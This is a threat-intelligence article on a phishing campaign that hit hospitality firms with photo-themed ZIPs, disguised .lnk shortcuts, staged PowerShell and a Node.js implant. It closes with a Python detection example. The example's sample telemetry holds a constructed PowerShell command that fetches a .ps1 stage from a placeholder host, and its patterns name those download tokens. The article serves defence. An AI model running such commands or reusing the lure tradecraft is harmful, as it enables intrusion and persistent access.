Photo ZIP Campaign Targets Hospitality Industry with Node.js Implant for Persistent Access


Microsoft Threat Intelligence has identified an active, multi-stage intrusion campaign that has targeted organizations in the hospitality and hotel industry since April 2026. Attackers delivered browser-downloaded photo-themed ZIP archives that contained executable shortcut files disguised as images. When opened, these shortcuts kicked off an obfuscated PowerShell chain that fetched a Node.js–based implant, established dual registry persistence, and initiated command-and-control (C2) communications over non-standard ports. Observed post-compromise behaviors include beaconing to C2, forced shutdowns, and on-host compilation of portable executable payloads. While attribution remains unconfirmed, the level of obfuscation and persistence suggests the operator may be preparing infected hosts for further follow-on activity.

What the campaign looked like in the wild

The campaign operated in two distinct waves. Wave 1 used shortcut files named with the pattern IMG-<digits>.png.lnk; Wave 2 shifted to PHOTO-<digits>.png.lnk and introduced an extra stage that dynamically compiled .NET DLLs via csc.exe before proceeding to Node.js deployment. The threat actor targeted devices and accounts associated with reception and front-office workflows, that is, staff who routinely open images or attachments as part of daily operations.

Observed LNK and ZIP naming patterns across both waves.

LNK file                 Source archive                                       Wave
IMG-805916584.png.lnk    C:\Users\[REDACTED]\Downloads\photo-961032103.zip    1
IMG-421741673.png.lnk    C:\Users\[REDACTED]\Downloads\photo-818773648.zip    1
IMG-223099041.png.lnk    C:\Users\[REDACTED]\Downloads\photo-716449357.zip    1
IMG-386443483.png.lnk    Browser download                                     1
PHOTO-215746435.png.lnk  Browser download                                     2

Phishing infrastructure and authentication laundering

Starting in late May 2026, the actor abused legitimate services—most notably Calendly’s notification infrastructure and Google redirect functionality—to route phishing links through trusted providers. This multi-hop approach, which Microsoft describes as “authentication laundering,” allowed messages to pass SPF, DKIM, and DMARC checks because the emails were relayed through legitimate sending infrastructure even though the content was attacker-controlled. In practice this makes the phishing messages appear more legitimate to automated email authentication checks and increases the chance that recipients will trust and click the embedded links.

Authentication results for emails sent through the direct Calendly path.

Authentication check                Result   Why
SPF                                 Pass     Email sent from an authorized sending service
DKIM                                Pass     Signed by Calendly's SendGrid sending infrastructure
DMARC                               Pass     Alignment on the calendly.com domain
Composite authentication (CompAuth) Pass     All checks align

Multi-hop redirect chain and delivery

The phishing emails used a Calendly redirect as the first hop, which forwarded to a Google redirect, and ultimately landed on freshly registered .cfd domains fronted by Cloudflare. Final landing pages were frequently gated behind Cloudflare Turnstile challenges that served to block automated analysis and perform geo-gating prior to delivering the photo-themed ZIP archive. This redirect fragmentation helped obscure the eventual payload location and diluted URL reputation, making detection by automated URL reputation systems more difficult.

Lures, languages, and targeting

The campaign used multilingual, non-personalized lures that broadly referenced guest complaints, bedbug/infestation reports, room inquiries, or verification calls—themes designed to create urgency and reputational concern for hospitality staff. Microsoft observed messages in Japanese, Danish, and Dutch, with Japanese being the most prevalent. The messages were typically generic (no customer or organization names), consistent with a high-volume, list-driven distribution rather than narrowly tailored spear-phishing.

Phishing lure themes by language, listed by observed prevalence.

Language   Canonical lure (theme)
Japanese   Serious guest complaint
Japanese   Bedbug complaint, verification call
Japanese   Guest stay review request
Japanese   Room condition, facility inquiry
Japanese   Final warning: infestation, forced inspection
Danish     Bedbug complaint, inspection call
Danish     Formal complaint, notice of suspension
Danish     Health-risk safety alert
Dutch      Complaint: possible danger, hospitalization after stay

Technical attack chain: from shortcut to Node.js implant

  • Initial user execution: Victims download a photo-xxxx.zip archive and open what appears to be an image shortcut (.lnk). The shortcut executes code rather than opening an image.
  • PowerShell first stage: The LNK invokes obfuscated PowerShell that decodes a BigInt-encoded payload and uses Invoke-WebRequest to fetch a secondary .ps1 script from the campaign’s hosting domains.
  • Wave 2 .NET compilation: In later activity, the retrieved .ps1 script invoked csc.exe (with cvtres.exe) to compile small .NET DLLs on the host; these DLLs may be preparatory or conditional components of the chain.
  • Node.js implant and persistence: The actor deployed a Node.js–based implant that established persistent access via dual registry persistence mechanisms. The implant communicated with C2 over non-standard ports and supported actions such as beaconing, forced shutdowns, and on-host compilation of PE payloads.
  • Evasion and obfuscation: The campaign showed repeated obfuscation evolution across multiple phases of the PowerShell stage and used Cloudflare gating and redirect fragmentation to complicate automated analysis.

Representative observed artifacts:

Artifact            Name            Size
PowerShell script   qFWe908J.ps1    419 KB
Compiled DLL        bjygtujc.dll    3,072 bytes

Detection hints and defensive recommendations

Microsoft published Defender detections and community-focused guidance alongside its analysis. Based on the observed techniques, organizations should prioritize the following defensive controls and detection strategies:

  • User awareness and phishing-resistant practices: Train reception and front-office staff to treat unexpected image/attachment links with suspicion and verify unusual guest complaints or urgent requests through independent channels.
  • Email filtering and URL inspection: Although authentication laundering allows messages to pass SPF/DKIM/DMARC, organizations should apply content and URL reputation checks, multi-layered URL inspection, and heuristics for multi-hop redirects.
  • Browser and download restrictions: Limit browser-based downloads to trusted origins and enforce policies that prevent automatic execution of downloaded shortcut files.
  • PowerShell and application control: Enable logging and block or constrain PowerShell use where not required. Use application control (e.g., AppLocker, WDAC) to prevent unauthorized execution of scripts and newly compiled binaries.
  • Network monitoring: Monitor for unusual outbound connections over non-standard ports and beaconing patterns consistent with C2.
  • Endpoint detection: Enable and tune endpoint detection rules to catch obfuscated PowerShell, staged .ps1 retrieval, abnormal csc.exe activity leading to DLLs, and Node.js processes spawning network activity.
  • Rapid domain takedown and blocking: Maintain the ability to quickly block and report malicious domains (including short-lived .cfd domains) and use threat intelligence feeds to update protections.
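The endpoint and network hints above can be expressed as concrete rules over process, file and network telemetry. The following is an added example written for this article, not a Microsoft detection or code from the report; the events are constructed in a simplified Sysmon-like shape, the pids, user name, IP addresses and the hxxp://placeholder.invalid URL are placeholders, and only the file names qFWe908J.ps1, bjygtujc.dll and the IMG-*.png.lnk pattern come from the page.

```python
import re

# Constructed sample telemetry (file-create, process-create, network-connect); not real campaign data.
SAMPLE_EVENTS = [
    {"kind": "file", "pid": 4010, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Downloads\IMG-805916584.png.lnk"},
    {"kind": "process", "pid": 5120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -nop -c $b=[bigint]::Parse($s);"
                r"iwr hxxp://placeholder.invalid/qFWe908J.ps1 -OutFile $env:TEMP\q.ps1"},
    {"kind": "process", "pid": 5130, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"csc.exe /noconfig /target:library /out:C:\Users\alice\AppData\Local\Temp\bjygtujc.dll"},
    {"kind": "network", "pid": 5140, "image": r"C:\Users\alice\AppData\Roaming\node\node.exe",
     "dst_ip": "203.0.113.10", "dst_port": 8443},
    # Benign look-alikes that the rules should not flag.
    {"kind": "process", "pid": 6000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"kind": "network", "pid": 6100, "image": r"C:\Program Files\nodejs\node.exe",
     "dst_ip": "203.0.113.20", "dst_port": 443},
]

# Image extension followed by .lnk (the campaign's IMG-/PHOTO-*.png.lnk naming).
DOUBLE_EXT_LNK = re.compile(r"\.(?:png|jpe?g|gif)\.lnk$", re.I)
# Tokens typical of the staged PowerShell: hidden window, BigInt decode, web fetch, .ps1 stage.
PS_TOKENS = re.compile(r"-w(?:indowstyle)?\s+hidden|\[bigint\]|invoke-webrequest|\biwr\b|\.ps1\b", re.I)
WEB_PORTS = {80, 443}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, pid) pairs for events matching the campaign's observed TTPs."""
    hits = []
    for ev in events:
        image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
        if ev["kind"] == "file" and DOUBLE_EXT_LNK.search(ev["target"]) and "\\downloads\\" in ev["target"].lower():
            hits.append(("double_extension_lnk_in_downloads", ev["pid"]))
        elif ev["kind"] == "process":
            cmd = ev.get("cmdline", "")
            # Require two independent tokens so a plain "-File script.ps1" does not trip the rule.
            if image == "powershell.exe" and parent == "explorer.exe" and len(PS_TOKENS.findall(cmd)) >= 2:
                hits.append(("obfuscated_powershell_from_explorer", ev["pid"]))
            if image in {"csc.exe", "cvtres.exe"} and parent == "powershell.exe":
                hits.append(("powershell_spawned_dotnet_compiler", ev["pid"]))
        elif ev["kind"] == "network" and image == "node.exe" and ev["dst_port"] not in WEB_PORTS:
            hits.append(("node_outbound_nonstandard_port", ev["pid"]))
    return hits
```

Each rule maps to one bullet above; tune the token list and the port allow-list to the organization's own baseline before deploying.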

Conclusion

This campaign highlights the continued effectiveness of social-engineering lures tailored to operational workflows and the adversary advantage gained by abusing legitimate infrastructure to bypass authentication checks. Hospitality organizations are particularly exposed because staff routinely exchange images and receive guest-related communications. Combining user training with layered technical controls (email/URL inspection, application control, PowerShell restrictions, and network telemetry) reduces the risk of successful exploitation and helps detect post-compromise activity earlier.
